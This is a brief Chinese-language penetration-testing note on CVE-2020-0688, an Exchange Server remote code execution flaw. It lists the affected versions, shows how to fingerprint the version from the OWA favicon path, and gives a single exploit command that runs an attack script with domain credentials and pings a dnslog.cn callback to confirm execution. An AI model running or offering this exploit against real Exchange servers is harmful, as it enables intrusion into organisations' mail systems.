RCE 需要域用户(CVE 2020 0688)
漏洞概述¶
由于Exchange服务器在安装时没有正确地创建唯一的加密密钥所造成的
影响范围¶
#需要域用户登陆
2010、2013、2016、2019
对于如何识别版本可以用如下的方式:
在登录界面查看网页源代码,15.1.225就是版本,之后在Mircosoft网站上根据版本号就可以直接查询
找到<link rel="shortcut icon" href="/owa/auth/15.1.225/themes/resources/favicon.ico" type="image/x-icon">
EXP¶
python CVE-2020-0688.py -s https://ip/owa/ -u user -p pass -c "ping test.ph4nxq.dnslog.cn"